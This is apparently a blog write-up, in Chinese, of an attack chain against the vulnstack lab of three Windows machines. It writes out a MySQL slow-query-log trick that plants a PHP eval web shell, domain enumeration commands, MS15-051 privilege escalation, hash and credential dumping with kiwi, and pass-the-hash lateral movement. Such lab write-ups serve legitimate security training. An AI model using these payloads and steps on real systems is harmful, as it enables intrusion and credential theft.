赞
踩
靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
按要求对三个靶机进行网络环境配置,最终网络拓扑结构如下
win7 外网192.168.133.143/内网 192.168.58.128
win server 2003 内网 192.168.58.141
win server 2008 内网192.168.58.138
按靶场介绍,口令统一为hongrisec@2019
将Win7靶机上的PhpStudy启动后即可开始渗透
对端口信息进行探测,发现开启了80端口和3306端口。推测架设了WEB服务和MySQL数据库服务
这里需要知道网站的绝对路径,这里是通过访问站点时的PHP探针发现的。除了这个还可以通过尝试或者报错的方式来进行获取。
set global slow_query_log=1;
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php'
select '<?php eval($_POST[g]);?>' or sleep(11);
上线后对目标主机进行网络环境的探测,可以发现有域环境存在(必须的
shell ipconfig
shell net time /domain
shell nltest /DCLIST:god.org
shell net group "domain admins" /domain
在打下来的WEB服务器中架设Pivot
之后使用MS15-051进行提权
提权完成后通过beacon命令
hashdump
导出目标机上的Hash
load kiwi
creds_all
之后创建一个smb类型的listener(这里必须要使用smb,不能用http,原因未知)
对其他机器的渗透同理。进行两次PTH操作后就能拿到所有主机的权限。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。